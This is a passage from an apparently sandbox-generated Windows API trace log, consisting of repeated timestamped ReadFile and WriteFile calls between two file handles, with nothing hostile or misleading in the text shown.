lpOverlapped=0x0) returned 1 [0021.177] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.179] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3a7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.179] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.180] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.181] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.182] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.183] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x234, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.184] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.185] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.187] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.188] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.188] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.189] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.190] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.190] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.191] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.192] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.193] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.195] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.196] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.197] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.198] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.199] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.199] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.201] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.201] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.203] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.204] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.205] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.205] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.206] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.206] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.207] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.208] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.209] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.209] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.210] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.211] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.212] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.213] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.214] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.216] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.216] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.217] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.217] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.218] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.219] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.220] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.220] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.221] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.222] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.223] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x23d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.225] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.226] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.226] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.227] WriteFile (in: hFile=0x2b4, 